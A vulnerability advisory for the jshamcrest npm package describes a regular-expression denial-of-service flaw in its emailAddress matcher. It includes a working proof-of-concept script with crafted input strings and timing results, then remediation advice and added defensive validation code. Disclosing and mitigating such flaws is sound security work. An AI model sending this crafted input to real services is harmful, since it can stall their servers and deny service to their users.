jshamcrest

Regular Expression Denial of Service

Severity: high

Overview

The jshamcrest package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.

Proof of concept

var js = require('jshamcrest');
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();

// Build a string of `len` + 1 repetitions of `chr`.
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }

    return result;
};

// Grow the input one character per iteration and time each match call;
// the event loop is blocked for the duration printed by process.hrtime().
for (var i = 1; i <= 10000000; i = i + 1) {
    console.log("COUNT: " + i);
    var str = '[email protected]' + genstr(i, 'a') + '{';
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    emailAddress.matches(str);

    var end = process.hrtime(start);
    console.log(end);
}

Results

It takes about 116 characters to get a 1.6 second event loop block.

[ 1, 633084590 ]
COUNT: 51
LENGTH: 116

Timeline

  • October 25, 2015 - Vulnerability Identified
  • October 25, 2015 - Maintainers notified (no response)

Remediation

The jshamcrest package currently has no patched versions available.

At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting these criteria available on npm.
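Independently of which module replaces jshamcrest, the exposure above comes from handing unbounded, attacker-controlled strings to a backtracking regex. The following is an added example, not code from the advisory or from the jshamcrest project: a length-capped guard that can wrap any third-party matcher, plus a single-pass email plausibility check whose cost is linear in the input length. The length cap, the accepted character sets and the function names are this example's own assumptions.

```javascript
// Added example (not part of the advisory or of jshamcrest): bound the
// input before any matcher runs, and validate with a single scan rather
// than a backtracking regular expression.

// Assumed cap: RFC 5321 limits a full address to 254 octets, so longer
// input is rejected before a regex-based matcher ever sees it.
const MAX_EMAIL_LENGTH = 254;

// Run `matchFn` only for strings within the length cap. The result
// distinguishes oversize input so callers can log it separately; a
// burst of such rejections is a cheap signal of ReDoS probing.
function guardedMatch(matchFn, input, maxLen = MAX_EMAIL_LENGTH) {
  if (typeof input !== 'string' || input.length > maxLen) {
    return { ok: false, rejectedForLength: true };
  }
  return { ok: Boolean(matchFn(input)), rejectedForLength: false };
}

function isAlnum(c) {
  return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
}

// Assumed local-part alphabet: letters, digits, '.', '_', '+', '-'.
function isLocalChar(c) {
  return isAlnum(c) || '._+-'.includes(c);
}

// One left-to-right pass, no nested quantifiers, no backtracking:
// exactly one '@', a non-empty local part, and a domain of at least two
// dot-separated labels of letters/digits/hyphens (1..63 chars, no
// leading/trailing hyphen) ending in a TLD of at least two characters.
function isPlausibleEmail(address) {
  if (typeof address !== 'string' || address.length === 0 ||
      address.length > MAX_EMAIL_LENGTH) {
    return false;
  }
  const at = address.indexOf('@');
  if (at <= 0 || at !== address.lastIndexOf('@')) return false;

  const local = address.slice(0, at);
  const domain = address.slice(at + 1);
  for (const c of local) {
    if (!isLocalChar(c)) return false;
  }

  const labels = domain.split('.');
  if (labels.length < 2) return false;
  for (const label of labels) {
    if (label.length === 0 || label.length > 63) return false;
    if (label.startsWith('-') || label.endsWith('-')) return false;
    for (const c of label) {
      if (!isAlnum(c) && c !== '-') return false;
    }
  }
  return labels[labels.length - 1].length >= 2;
}
```

Used as `guardedMatch(s => emailAddress.matches(s), untrustedInput)`, the guard keeps an existing matcher in place while denying it the long inputs the proof of concept relies on; `isPlausibleEmail` is the stricter option for code paths where the matcher can be replaced outright, since a single scan takes the same time whether or not the input is malformed.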

Vulnerable versions

  • 0.6.7
  • 0.7.0
  • 0.7.1

Unaffected versions

Advisory timeline

  1. Published - Advisory published, Jan 5th, 2016
  2. Reported - Initial report by Adam Baldwin, Oct 25th, 2015